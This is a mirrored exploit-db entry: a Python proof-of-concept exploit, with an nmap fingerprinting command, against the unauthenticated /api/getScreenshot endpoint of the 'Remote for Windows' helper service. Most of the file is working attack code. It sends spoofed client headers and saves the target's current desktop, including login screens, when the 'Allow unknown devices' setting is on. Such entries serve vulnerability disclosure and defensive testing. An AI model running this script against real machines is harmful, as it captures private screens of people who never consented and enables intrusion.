exploit-db-mirror/exploits/windows/remote/52300.py

# Exploit Title: Windows 2024.15 -  Unauthenticated Desktop Screenshot Capture
# Date: 2025-05-19
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)

'''
Description:
- Exploits the getScreenshot API endpoint in Remote for Windows helper
service
- Works when "Allow unknown devices" setting is enabled (default: disabled)
- Captures current desktop including login screens (SYSTEM-level access)

Vulnerable Component:
- /api/getScreenshot endpoint with missing authentication checks


# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
'''

#!/usr/bin/env python3

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def capture_screenshot(ip, port, output_file):
    try:
        response = requests.get(
            f"https://{ip}:{port}/api/getScreenshot",
            headers={
                "X-ClientToken": "exploit",
                "X-HostName": "attacker-pc",
                "X-HostFullModel": "exploit-device"
            },
            verify=False,
            timeout=15
        )
        if response.status_code == 200 and
response.content.startswith(b'\xff\xd8'):
            with open(output_file, 'wb') as f:
                f.write(response.content)
            print(f"[+] Saved: {output_file}")
            return True
        print(f"[-] Failed: HTTP {response.status_code}")
        return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <IP> <PORT> <output.jpg>")
        sys.exit(1)
    sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3])
else 1)